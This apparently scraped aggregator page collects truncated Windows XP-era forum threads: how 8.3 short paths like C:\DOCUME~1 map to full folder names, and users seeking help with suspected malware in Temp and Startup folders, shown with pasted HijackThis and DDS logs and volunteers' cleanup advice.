Tech Problem Aggregator

How do you interpret paths like C:\DOCUME~1\...

Q: How do you interpret paths like C:\DOCUME~1\...

I have Windows XP Pro, sp 2.

I've encountered paths like: C:\DOCUME~1\ROYON~1\LOCALS~1\Temp. Except the tilde is higher. I don't know how to follow paths when there like this. Can someone please tell me how to interpret this path?

Thanks,

royeo

A: How do you interpret paths like C:\DOCUME~1\...

Hi.

This kind of path is contraction of the real folder or file names so that they are compatible with the old 8.3 DOS filename format. I don't know why it is necessary, but in (my) theory it works this way:
Long names are stripped of all spaces, even between words.
If the resulting string, without extension, is longer than 8 characters, the 6 leftmost characters are taken and an index appended, to distinguish between similar names.
So "ASDFGHJKLQWE" becomes "ASDFGH~1" while ASDFGHJKLRTZ" becomes "ASDFGH~2"

So the one you submitted translates to something like

C:\Documents and Settings\Username\Local Settings\Temp
Where username is different for each user of the computer.

2 more replies
Answer Match 54.6%

I guess this may be a tiny bit off the subject here, but I am attempting this in windows 7.

I have a program file manager tool called 'Directory Opus' that is capable of calling windows external programs and passing them the current directory the file manager is sitting on.

So far so good.

Now I want to call a cygwin (linux/unix emulator for windows) terminal with that file manager.

Checking properties on the cygwin Icon I got the path: C:\cygwin\bin\mintty.exe -i /Cygwin-Terminal.ico -

So it is a path to a command and an argument to that command.

Actually I guess it is 2 arguments to a command since I think '-' in that position means to feed anything on STDIN to the command. At least that would be true in unix shell programming.

So using the Directory opus setup I pass this call:
'@async:C:\cygwin\bin\mintty.exe -i /Cygwin-Terminal.ico - <and here add {s}>'

So the call ends up:
'@async:C:\cygwin\bin\mintty.exe -i /Cygwin-Terminal.ico - {s}'

That call does just what it is supposed to. It passed the current file absolute address however cygwin terminal does not understand the windows path notation. If I were passing it: C:\subdir\blah\ It would just say 'No such file' Cygwin terminal wants to see /cygdrive/c/subdir/blah Or at least I think that is what is happing.

So to cut to the chase.... I'd like to put a little wrapper to Cygwin terminal in there with the code necessary to convert 'C:\subdir\blah\' to '/cygdrive/c/subdir/blah/'

But, I do not know how ... Read more

A:Dos paths and unix paths conversion

I would ask on DonationCoder.com specifically this forum:
General Software Discussion - DonationCoder.com

The reason is I know there are a bunch of DO aficionados, who also use Linux, on that forum. I've never tried DO myself. I have played around with CygWin. But it's been a few years.

If the site wants a donation to sign up just explain to Mouser why you want to post etc.. I think he'll be sympathetic.

3 more replies
Answer Match 47.04%

Plz help me get my computer back and running the right way!!
 

More replies
Answer Match 47.04%

Logfile of HijackThis v1.99.1
Scan saved at 2:09:49 PM, on 8/5/2007
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\Program Files\NVIDIA Corporation\NvMixer\NVMixerTray.exe
C:\Program Files\ATI Technologies\ATI.ACE\cli.exe
C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
C:\Program Files\Java\jre1.6.0_02\bin\jusched.exe
C:\Program Files\MySpace\IM\MySpaceIM.exe
C:\Program Files\ATI Technologies\ATI.ACE\cli.exe
C:\Program Files\ATI Technologies\ATI.ACE\cli.exe
C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
C:\Program Files\Grisoft\AVG7\avgcc.exe
C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
C:\WINDOWS\explorer.exe
C:\WINDOWS\System32\SNDVOL32.EXE
C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\Alwil Software\Avast4\as... Read more

A:c:progra~1 and Docume~1 tgrojans

I wanted to add to the last post of what i am getting.

c:\docume~!\suzanne\local~!\temp
the viruses all have $ and numbers.

than is am getting these too.

c:\progra~1\Yahoo!\ASSIST~1\assist

yrepair.dll

please help me get rid of these for good. thanks
 

1 more replies
Answer Match 47.04%

Hello everyone!I was getting knocked offline everytime I opened IE 6, SP2 - complete with the c:\docume~1\christi~1\locals~1\temp\*changes each time*I did everything I was told to do on your page (which, by the way, is an AWESOME page - I am so not technicology savvy and I actually understood your directions!) and while I do see a significant reduction in the error messages, it is still happening. . . forgive me if I am posting this wrong, here is the log I got from running the HijackThis program:Logfile of HijackThis v1.99.1Scan saved at 12:32:57 PM, on 5/27/2006Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)Running processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\csrss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\system32\svchost.exeC:\Program Files\Windows Defender\MsMpEng.exeC:\WINDOWS\System32\svchost.exeC:\Program Files\Common Files\Symantec Shared\ccSetMgr.exeC:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exeC:\Program Files\Common Files\Symantec Shared\SNDSrvc.exeC:\WINDOWS\system32\spoolsv.exeC:\Program Files\Adobe\Photoshop Elements 4.0\PhotoshopElementsFi... Read more

A:Still Getting Booted Offline "c:\docume~1\ -

Sorry for the delay. If you are still having problems please post a brand new HijackThis log as a reply to this topic. Before posting the log, please make sure you follow all the steps found in this topic:Preparation Guide For Use Before Posting A Hijackthis Log

1 more replies
Answer Match 45.78%

I am not sure how bad my computer is infected I think I have a few different problems, but the first and for most is the "Error Loading C:\docume~1\locals~1\ntuser.dll" message I get on startup. Any help would be GREATLY appreciatedThanks in advance. ~NathanLogfile of Trend Micro HijackThis v2.0.2Scan saved at 10:05:59 AM, on 1/13/2010Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: Internet Explorer v8.00 (8.00.6001.18372)Boot mode: NormalRunning processes:C:\WINDOWS\system32\csrss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\system32\spoolsv.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\system32\hasplms.exeC:\Program Files\Java\jre6\bin\jqs.exeC:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXEC:\WINDOWS\system32\svchost.exeC:\WINDOWS\system32\svchost.exeC:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exeC:\WINDOWS\system32\wdfmgr.exeC:\Program Files\Viewpoint\Common\ViewpointService.exeC:\WINDOWS&#... Read more

A:Error Loading C:\docume~1\locals~1\ntuser.dll *Please Help*

Is there anyone that can help me?

3 more replies
Answer Match 45.78%

Hello,

Every time I open 'my computer" I get the following error message Windows Explorer has encountered a problem and needs to close. We are sorry for the inconvenience.

C:\DOCUME~1\Owner\LOCALS~1\Temp\4d36_appcompat.txt
 

More replies
Answer Match 45.78%

At the end of my computers boot up, just before the icons come up on the home screen, a DOS prompt window appears with a curser and the window is labeled "C:\Docume~1\Owner\APPLIC~1\System~1\1sass.exe". The window will then go away quickly, not prompting for any additional information. It has just started in the last few days. The computer seems to still run fine with no other issues. Do I have a promblem and if so what is it? I have found very little information about 1sass.exe and the discriptions I read do not match what I am experiencing.A HiJackThis log is attached.

A:C:\Docume~1\Owner\APPLIC~1\System~1\1sass.exe

Welcome to the BleepingComputer Forums. Since it has been a few days since you scanned your computer with HijackThis, we will need a new HijackThis log. If you have not already downloaded Random's System Information Tool (RSIT), please download Random's System Information Tool (RSIT) by random/random which includes a HijackThis log and save it to your desktop. If you have RSIT already on your computer, please run it again. Double click on RSIT.exe to run RSIT. Click Continue at the disclaimer screen. Please post the contents of log.txt. Thank you for your patience.Please see Preparation Guide for use before posting about your potential Malware problem. If you have already posted this log at another forum or if you decide to seek help at another forum, please let us know. There is a shortage of helpers and taking the time of two volunteer helpers means that someone else may not be helped. Please post your HijackThis log as a reply to this thread and not as an attachment. I am always leery of opening attachments so I always request that HijackThis logs are to be posted as a reply to the thread. I do not think that you are attaching anything scary but others may do so. While we are working on your HijackThis log, please: Reply to this thread; do not start another! Do not make any changes on your computer during the cleaning process or download/add programs on your computer unless instructed to do so. Do not run any other tool until ... Read more

10 more replies
Answer Match 45.78%

Hello,

I hope I placed this question in the right area. I presently have this error (C:\DOCUME~1\Owner\LOCALS~1\Temp\{10012~1.EXE) pop up upon starting my PC. If I click OK on it (only option) it locks up the PC and I cant do anything. As long as I leave it up I can continue to use my pc as normal. I am not the smartest when it comes to PC's, If it doesn't have a 5-speed in it, I cant fix it.

Could someone give me some ideas how to get rid of this annoying problem. I have updated and ran Malwarebytes but it doesnt recognize any issues. Any help would be greatly appreciated.

Thank you,
Damian

A:C:\DOCUME~1\Owner\LOCALS~1\Temp\{10012~1.EXE

It's not unusual to receive such an error(s) when "booting up" after using anti-virus and other security scanning tools to remove a malware infection.A "Cannot find...", "Could not run...", "Error loading... or "specific module could not be found" message is usually related to a malware file that was set to run at startup in the registry but has been deleted. Windows is trying to load this file but cannot locate it since the file was mostly likely removed during an anti-virus or anti-malware scan. However, an associated orphaned registry entry still remains and is telling Windows to load the file when you boot up. Since the file no longer exists, Windows will display an error message. You need to remove this registry entry so Windows stops searching for the file when it loads. To resolve this, download Autoruns, search for the related entry and then delete it.Create a new folder on your hard drive called AutoRuns (C:\AutoRuns) and extract (unzip) the file there.
Vista/Windows 7 users refer to these instructions.Open the folder and double-click on autoruns.exe to launch it.
Vista/Windows 7 users right-click and select Run As Administrator.Please be patient as it scans and populates the entries.When done scanning, it will say Ready at the bottom.Scroll through the list and look for a startup entry related to the file(s) in the error message.If found, right-click on the entry and choose delete.Reboot your computer and see if... Read more

3 more replies
Answer Match 45.36%

I have this problem when I open a site on Adobe Go Live. either the site crashes or the program does. I can open other sites within the program - older backups for example but I need the latest. In the error report to microsoft site the above error is given, but never the same ending. Can you help?

Running XP Pro sp3

More replies
Answer Match 44.94%

Hey im having trouble recently with this file,,if im internet explorer windows explorer it gives me a error report and that files included in all of em.
 

A:C:\DOCUME~1\Trevor\LOCALS~1\Temp\WER1A5.tmp.dir00\ appcompat.txt

11 more replies
Answer Match 44.94%

I get this error, along with another one saying Windows cannot load 'C:\DOCUME~1\Parent\LOCALS~1\Temp\crss.exe'. Ive tried Virus scanners, malware scanners, registry cleaners....just about everything. Its getting annoying and im not too good with computers so i dont know what to do.

A:Windows cannot find 'C:\DOCUME~1\Parent\LOCALS~1\Temp\crss.exe'.

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the ... Read more

3 more replies
Answer Match 44.94%

DDS (Ver_09-01-19.01) - NTFSx86
Run by Heather at 14:43:39.31 on Sat 01/31/2009
Internet Explorer: 7.0.5730.11
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.1024.579 [GMT -5:00]

FW: Norton Internet Security *disabled*

============== Running Processes ===============
DDS (Ver_09-01-19.01) - NTFSx86
Run by Heather at 14:43:39.31 on Sat 01/31/2009
Internet Explorer: 7.0.5730.11
Microsoft Windows XP Home Edition 5.1.2600.3.1252.1.1033.18.1024.579 [GMT -5:00]

FW: Norton Internet Security *disabled*

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
C:\WINDOWS\system32\svchost -k rpcss
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\WINDOWS\System32\svchost.exe -k NetworkService
C:\WINDOWS\System32\svchost.exe -k LocalService
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Analog Devices\SoundMAX\SMTray.exe
C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe
C:\WINDOWS\system32\carpserv.exe
C:\Program Files\Classic PhoneTools\CapFax.EXE
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\WildTangent\Apps\CDA\GameDrvr.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\Program Files\Adobe\Photoshop Album Starter Edition\3.2\App... Read more

A:infected through Norton? C:\DOCUME~1\Frank\LOCALS~1\Temp\~tmpa.exe

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a description of your problem, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.comDDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results, click no to the Optional_ScanFollow the ... Read more

2 more replies
Answer Match 44.94%

Hi. My husband has a small insurance agency. I have set him up with my son's computer (DELL DIM 4500, XP SP 3). We attempted to download the New York State ID card generator software and get this error message:

Cannot find file C:\DOCUME~1\DANDIR~1\Temp\pftE5~tmp\SETUP.EXE (or one of its components.) Check to ensure the path and filename are correct and that all required libraries are available.

A word: I am not a programmer and do not fool around with msconfig unless I am told to! I do enjoy the challenge, tho. And, I have to say, thanks for helping all of us who have a problem and no where to go.

SueDi

A:Cannot find file C:\DOCUME~1\DANDIR~1\Temp\pftE5~tmp\SETUP.EXE

Hi and welcome to TSF

Have you looked on their site?:

http://www.ins.state.ny.us/iies/html/iies1.htm#download

You can contact them also.

BG

2 more replies
Answer Match 44.52%

Ever since I received this missing exe, error message, I can no longer connect to the internet on this Windows XP System. I can connect using other computers, so my connection into my home is fine.
 

More replies
Answer Match 44.52%

C:\DOCUME~1\ADMINI~1\LOCALS~1C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\WER7d59.dir00\appcompat.txt\Temp\WER7d59.dir00\userinit.exe.mdmp

A:C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\WER7d59.dir00\userinit.exe.mdmp

What about it? It's in the Temp folder, simply delete it.

1 more replies
Answer Match 44.52%

Hi all. I've been receiving the above error message: C:\DOCUME~1\ALLUSE~1\STARTM~1\Programs\Startup\MS_UPD.EXE, accompanied by a small window that states 'The NTVDM CPU has encountered an illegal instruction. CS:0000 IP:0077 0PF0 3705 OC 02' the past two times I restarted my PC. I reformatted yesterday since my PC contracted the virus Win32:Virut last weekend and haven't had any problems until just this evening, after I'd reloaded and recovered all my old files from a portable hard drive (which I first scanned thoroughly with avast). I thought it might have something to do with the fact that I can't figure out what sound card I have; I'd written down 'SB Audigy 9000', but the PC's not recognizing the update I ran for that - it's not recognizing that I have a sound card at all and I know I do!

So far the error message doesn't seem to be causing any problems other than opening that little DOS-like window and then giving me the 'Send Error Report/Don't Send' message after I receive the 'illegal instruction' message.

What do I do about this? My late husband handled all the tech issues with our PCs, so this is my first time around doing the reformatting thing. Any help/advice would be much appreciated.

Also; how in the world do I determine what kind of sound card I have? Please excuse my ignorance; as I said, this is my first solo flight in this area. Should I not ha... Read more

A:Receiving Error: 'c:\docume~1\alluse~1\ Startm~1\programs\startup\ Ms_upd.exe

From what I am finding out with the information you provided you may be using the wrong drivers. That error message, "The NTVDM CPU has encountered an illegal instruction.", refers to a 16bit application error under NT\Win 2000\XP.The first step would be to make sure you did not download a 98\ME driver instead of a XP drier.The other thing to do would be to run the System File Checker (sfc). To run SFC go to Start then Run. Type in sfc /scannow and press enter. Make sure your Windows CD is in the drive. If SFC discovers a bad file it will replace it with the correct file from your Windows CD.

10 more replies
Answer Match 44.1%

My computer runs Windows XP Home Edition Version 2002, Service Pack 2. I was having problems with my printer so I uninstalled and then reinstalled and now I get the following error.

Cannot find file:
///C:/DOCUME~1/Owner/LOCALS~1/Temp/nosget_start_manager.htmf. Make sure the path or Internet address is correct.

What do I you about this?

Any assistance would be greatly appreciated.

I am only an intermediate computer kind of person so, if it could be explained at my level, that would be even for wonderful.

Thank you kindly,

Nashvillelorelle
 

More replies
Answer Match 41.16%

Logfile of HijackThis v1.99.1
Scan saved at 09:44:28, on 24/10/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\Program Files\Common Files\Symantec Shared\ccProxy.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exe
C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exe
C:\Program Files\Common Files\EPSON\EBAPI\SAgent2.exe
C:\Program Files\Norton Internet Security\Norton AntiVirus\navapsvc.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\pctspk.exe
C:\Program Files\SolidDocuments\SolidConverterPDF\SCPDF\SolidPdfService.exe
C:\WINDOWS\System32\tcpsvcs.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\wdfmgr.exe
C:\Program Files\Java\jre1.5.0_02\bin\jusched.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.e... Read more

A:please help interpret HJ log.

Hi and welcome to the Security Forum.

Apologies for any delay in replying, but we have been rather busy lately.

Since it has been a few days since you first posted, please post a fresh HijackThis Log if you still need assistance.

Thank you.

1 more replies
Answer Match 41.16%

This may not be completely relevant to this section, but in my time here, I think this section may be where I can find people that can answer this question.

On Friday, a buddy of mine dropped off two laptops insisting that somebody changed his paypal password and afraid that he had a keylogger on his system. As always, I was willing to help, but found nothing that indicated that other than a few suspicious things such as mywebsearch- regardless, I just restored both of his laptops from the disk image. For a second I thought he was just a computer hypochondriac, but then I thought, what if he had an MBR infection?

So, my question is this- What will it take for a motivated individual to learn how to interpret the MBR code, since I believe that it is not overwritten by the hard drive disk image?

I could just point him here to solve his problem, but I know he is not very good/patient with computers, and I don't want to post anything under the false pretense that it is my computer. I would like to be able to start and maybe learn some more computer stuff, since it has really been the only persistent interest since before college and before (and after) the company I was working for collapsed.

Where do I start the learning process? School is out of the question since I don't have the cash.....just books or specific areas of learning that I could pick up at the library. I went over some wikis on code and languages, but there are a thousand steps in different direct... Read more

A:How to interpret what I see

A MBR scanner is the best way I've found.
GMER is widely used> GMER - Rootkit Detector and Remover

I also have been known to use aswMBR> aswMBR

and TDSSKiller> Anti-rootkit utility TDSSKiller

Trying to read MBR code I've never spent the time to learn.

3 more replies
Answer Match 41.16%

I flatter myself if I describe me as a 'naive user'.

that said, I'd be deeply grateful if an expert could cast an eye over these logs, attached.

thanksazillion

brian

This by way of a post script with a bit more info, tho' I don't pretend to have any idea how to interpret it. thanks again

A:How To Interpret?

Hello and Welcome to the forums! My name is Carolyn and I'll be glad to help you with your computer problems. HijackThis logs can take some time to research, so please be patient with me. I know that you need your computer working as quickly as possible, and I will work hard to help see that it happens. Please reply to this thread, do not start another. Please tell me about any problems that have occurred during the fix. Please tell me of any other symptoms you may be having as these can help also. Please try as much as possible not to run anything while executing a fix. As I am still in training, everything that I post to you must be checked by one of the teachers. Thus, there may be a bit of a delay between posts, but it shouldn't be too long. If you follow these instructions, everything should go smoothly. I am sorry that we were unable to reply to your post sooner. The forums have been very busy. If you are still in need of assistance, please scan again with HijackThis and post a fresh log. Also, please make an uninstall list using HijackThis To access the Uninstall Manager you would do the following: 1. Start HijackThis 2. Click on the Config button 3. Click on the Misc Tools button 4. Click on the Open Uninstall Manager button. 5. Click on the Save list... button and specify where you would like to save this file. When you press Save button a notepad will open with the contents of that file. Simply copy ... Read more

2 more replies
Answer Match 41.16%

HJT log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 7:06:18 AM, on 9/13/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\Program Files\Webroot\WebrootSecurity\WRConsumerService.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Common Files\Acronis\Schedule2\schedul2.exe
C:\Program Files\Common Files\AOL\ACS\AOLAcsd.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\WINDOWS\system32\CTsvcCDA.exe
C:\Program Files\Common Files\InterVideo\RegMgr\iviRegMgr.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\Common Files\LogiShrd\LVCOMSER\LVComSer.exe
C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\MozyHome\mozybackup.exe
C:\Program Files\Microsoft SQL Server\MSSQL$MICROSOFTSMLBIZ\Binn\sqlservr.exe
C:\Program Files\Norton Internet Security\Engine\16.7.2.11\ccSvcHst.exe
C:\Program Files\IObit\Advanced WindowsCare V2\MemCleaner.exe
C:\Progra... Read more

A:Please interpret--thanks!

Sorry, I should have mentioned that my computer seems to be running very slowly, and when I do scans with Spyware or Norton IS, they take forever. The results from those scans are always low level threats like cookies. Thanks.
 

1 more replies
Answer Match 41.16%

xp pro
2.8 g intel
1 g ram
160 hd
250 hd

okay, i think i got rid of sah, but it took 2 days to do it? am I clean? please help

Logfile of HijackThis v1.98.2
Scan saved at 11:30:33 AM, on 11/25/2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Ahead\InCD\InCDsrv.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\ccProxy.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\Program Files\Norton Internet Security\ISSVC.exe
C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\System32\inetsrv\inetinfo.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\Program Files\Norton Internet Security\Norton AntiVirus\navapsvc.exe
C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe... Read more

A:CAN YOU INTERPRET MY hjt LOG?

16 more replies
Answer Match 41.16%

Below is the hjt log from my gf's computer- i already ran adaware, spybot, and cwshredder. Please analyze this log- but in the future, how can i do this myself- so I don't have to bug you guys everytime.

Thank you!
Logfile of HijackThis v1.98.2
Scan saved at 3:53:26 PM, on 11/2/2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\PROGRA~1\COMMON~1\AOL\ACS\acsd.exe
c:\PROGRA~1\mcafee.com\vso\mcvsrte.exe
C:\WINDOWS\wanmpsvc.exe
c:\PROGRA~1\mcafee.com\vso\mcshield.exe
C:\WINDOWS\System32\hkcmd.exe
C:\Program Files\Java\j2re1.4.2_03\bin\jusched.exe
C:\Program Files\Dell\Media Experience\PCMService.exe
C:\WINDOWS\system32\dla\tfswctrl.exe
C:\Program Files\Real\RealPlayer\RealPlay.exe
C:\PROGRA~1\mcafee.com\agent\mcagent.exe
C:\Program Files\MusicMatch\MusicMatch Jukebox\mmtask.exe
C:\Program Files\MUSICMATCH\Musicmatch Jukebox\mm_tray.exe
C:\Program Files\Common Files\Dell\EUSW\Support.exe
C:\PROGRA~1\mcafee.com\vso\mcvsshld.exe
C:\Program Files\Viewpoint\Viewpoint Manager\ViewMgr.exe
C:\Program Files\HP\hpcoretech\hpcmpmgr.exe
C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb10.exe
C:\Program Files\Hewlett-Packard\HP Software Update\HPWuSchd2.exe
c:\progra~1\... Read more

A:how can I interpret my own hjt log?

16 more replies
Answer Match 41.16%

i just ran ewido program in safemode now heres my HJT log...im attaching my ewido scan report as well.

Logfile of HijackThis v1.99.1
Scan saved at 6:22:25 PM, on 1/4/2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
D:\WINDOWS\System32\smss.exe
D:\WINDOWS\system32\winlogon.exe
D:\WINDOWS\system32\services.exe
D:\WINDOWS\system32\lsass.exe
D:\WINDOWS\system32\svchost.exe
D:\WINDOWS\System32\svchost.exe
D:\WINDOWS\system32\spoolsv.exe
D:\WINDOWS\Explorer.EXE
D:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
D:\Program Files\Java\jre1.5.0_06\bin\jusched.exe
D:\Program Files\Pro Imaging Powertoys\Microsoft Color Control Panel Applet for Windows XP\WinColorReminder.exe
D:\Program Files\Zone Labs\ZoneAlarm\zapro.exe
D:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
D:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
D:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
D:\Program Files\ewido anti-malware\ewidoctrl.exe
D:\WINDOWS\System32\snmp.exe
D:\WINDOWS\System32\svchost.exe
D:\WINDOWS\system32\ZoneLabs\vsmon.exe
D:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
D:\WINDOWS\system32\wuauclt.exe
C:\hijackthis\HijackThis.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://us.rd.yahoo.com/customize/ie/defaults/sb/msgr7/*http://www.yahoo.com/ext/search/search.html
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
R3 - Default URLSearchHook is missing
O2 - BHO: AcroIEHlprObj Class -... Read more

A:Need Some Help To Interpret My Hjt Log

Run ActiveScan online virus scan:
http://www.pandasoftware.com/products/activescan.htm

When the scan is finished, anything that it cannot clean have it delete it.
Make a note of the file location of anything that cannot be deleted so you can delete it yourself.
Save the results from the scan and post them here please.
 

1 more replies
Answer Match 40.74%

